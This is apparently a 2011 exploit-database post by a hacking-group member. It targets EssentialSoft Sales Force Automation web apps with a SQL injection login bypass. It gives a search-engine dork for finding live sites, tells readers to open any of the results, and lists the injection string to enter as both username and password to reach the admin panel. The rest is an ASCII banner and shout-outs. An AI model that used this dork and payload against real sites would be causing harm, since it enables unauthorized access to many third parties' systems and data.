EssentialSoft Sales Force Automation Systems suffers from a remote SQL injection vulnerability that allows for authentication bypass.
27ce6d8c26ec03e95b0df00e1d7092bc44217f3c5d9e27a494d26594ab3df74b
#(+)Exploit Title: EssentialSoft Sales Force Automation systems mass Login bypass exploit
#(+)Author : ^Xecuti0n3r
#(+) Date : 16.6.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) dork : intext:"designed and hosted by EssentialSoft"
#(+) Category : Web Apps [SQli]
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork intext:"designed and hosted by EssentialSoft" in search engine
Just open any of the links that come up in the google search..
Credentials that will bypass the admin login are :
user: 1' or '1'='1
pass : 1' or '1'='1
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :)
(+)<3 to :Indian Cyber Army & Indishell Crew
(+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com
########################################################################